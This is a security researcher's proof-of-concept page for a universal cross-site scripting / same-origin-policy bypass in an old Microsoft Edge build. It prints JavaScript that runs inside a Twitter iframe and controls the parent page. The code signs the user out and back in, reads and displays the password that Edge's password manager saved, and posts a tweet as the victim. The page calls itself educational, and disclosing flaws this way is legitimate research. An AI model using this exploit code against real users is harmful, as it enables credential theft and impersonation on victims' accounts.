Natural Selection Evidence

This proof of concept assumes that you have a Twitter tab/window already opened. If you don't, please, open one now!

The following script will tweet on your account (if you are logged in and using MS Edge)
If your password was saved by Password Manager (default behavior in Edge), then the [ Get Password ] button will reveal your real Twitter password in your screen.

This is for educational purposes only. Stealing a password is probably illegal in your country. DON'T DO IT.

Tweeting like Charles Darwin

This code executes inside Twitter's blank iframe "dm-post-iframe" thanks to the data-meta-data SOP bypass


		// Sign Out

		parent.document.getElementById("signout-button").click();



		// Sign In

		parent.document.querySelectorAll("[pb-role=submit]")[0].click();


		
		// Get Password

		alert("Password: " + parent.document.querySelectorAll("[pb-role=password]")[0].value);


		
		// Tweet

		boxTextToTweet = parent.document.getElementById("tweet-box-home-timeline");

		btnPostTweet = parent.document.getElementsByClassName("btn primary-btn tweet-action tweet-btn js-tweet-btn")[0];


		
		boxTextToTweet.focus();

		boxTextToTweet.innerHTML = taText.value;

		btnPostTweet.click();

Tested on: Microsoft Edge 40.15063.0.0 / EdgeHTML 15.15063

Explanation: SOP bypass / UXSS data-meta-data in a domainless world (Edge)

Contact: @magicmac2000